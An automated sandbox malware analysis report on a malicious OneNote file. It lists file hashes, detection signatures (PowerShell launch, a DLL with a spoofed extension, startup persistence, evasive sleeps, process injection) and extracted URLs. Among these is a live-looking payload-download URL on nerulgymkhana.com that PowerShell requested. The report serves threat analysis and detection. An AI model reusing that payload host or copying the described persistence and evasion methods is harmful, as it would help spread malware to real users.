Windows Analysis Report
Original.one

Overview

General Information

Sample Name: Original.one
Analysis ID: 800789
MD5: f727e5b082e13d521668e2908b3b7607
SHA1: 4eb0f8309b33e7f79cfa2d37523690dbe1ad0c97
SHA256: 8529b2ec8ed9d701904b8e2560cb3f12d049fedecb588102b5baf6d7a4c7830a
Infos:

Detection

Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: Execute DLL with spoofed extension
Malicious sample detected (through community Yara rule)
Document exploit detected (process start blacklist hit)
Suspicious powershell command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Creates a start menu entry (Start Menu\Programs\Startup)
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
JA3 SSL client fingerprint seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

Source: unknown HTTPS traffic detected: 109.203.123.62:443 -> 192.168.2.3:49704 version: TLS 1.0

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE Process created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
Source: global traffic HTTP traffic detected: GET /CCoN/01.gif HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: nerulgymkhana.comConnection: Keep-Alive
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknown HTTPS traffic detected: 109.203.123.62:443 -> 192.168.2.3:49704 version: TLS 1.0
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: powershell.exe, 00000003.00000002.274034149.0000027D4FF53000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: powershell.exe, 00000003.00000002.274530600.0000027D500B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://api.aadrm.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://api.aadrm.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://api.cortana.ai
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://api.office.net
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://api.onedrive.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://api.scheduler.
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://augloop.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://cdn.entity.
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://clients.config.office.net/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://config.edge.skype.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://cortana.ai
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://cortana.ai/api
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://cr.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://d.docs.live.net
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://dev.cortana.ai
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://devnull.onenote.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://directory.services.
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://enrichment.osi.office.net/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://graph.windows.net
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://graph.windows.net/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://invites.office.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://lifecycle.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://login.windows.local
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://make.powerautomate.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://management.azure.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://management.azure.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://messaging.action.office.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://messaging.engagement.office.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://messaging.lifecycle.office.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://messaging.office.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://my.microsoftpersonalcontent.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://ncus.contentsync.
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://ncus.pagecontentsync.
Source: powershell.exe, 00000003.00000002.274530600.0000027D50643000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.274530600.0000027D50566000.00000004.00000800.00020000.00000000.sdmp, in.cmd.1.dr String found in binary or memory: https://nerulgymkhana.com/CCoN/01.gif
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://officeapps.live.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://onedrive.live.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://otelrules.azureedge.net
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://outlook.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://outlook.office.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://outlook.office365.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://outlook.office365.com/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://pages.store.office.com/review/query
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://pushchannel.1drv.ms
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://res.cdn.office.net/polymer/models
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://settings.outlook.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://staging.cortana.ai
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://substrate.office.com/Notes-Internal.ReadWrite
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://tasks.office.com
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: D95B36A3-A6E1-458A-A353-27D51DD43A0C.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
